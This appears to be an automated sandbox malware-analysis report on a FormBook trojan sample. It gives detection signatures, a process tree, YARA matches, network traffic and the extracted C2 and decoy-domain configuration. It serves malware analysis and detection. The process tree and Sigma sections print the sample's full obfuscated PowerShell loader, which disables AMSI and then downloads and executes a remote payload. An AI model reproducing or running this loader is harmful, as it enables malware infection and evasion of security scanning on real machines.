Loading ...

Play interactive tourEdit tour

Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name:s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID:452684
MD5:f5041ec4ce468a07ecbfd076bc0f879b
SHA1:bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256:caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • s2rsXUiUn8.exe (PID: 4440 cmdline: 'C:\Users\user\Desktop\s2rsXUiUn8.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
    • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5116 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
      • calc.exe (PID: 5856 cmdline: {path} MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
        • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 4344 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.calc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.calc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.calc.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        9.2.calc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.calc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: s2rsXUiUn8.exeMetadefender: Detection: 17%Perma Link
          Source: s2rsXUiUn8.exeReversingLabs: Detection: 57%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY
          Source: 9.2.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop ebx9_2_00407AFA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop edi9_2_0040E43F
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx19_2_001A7AFB
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi19_2_001AE43F

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.homekeycap.com/pjje/
          Source: global trafficHTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: google.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
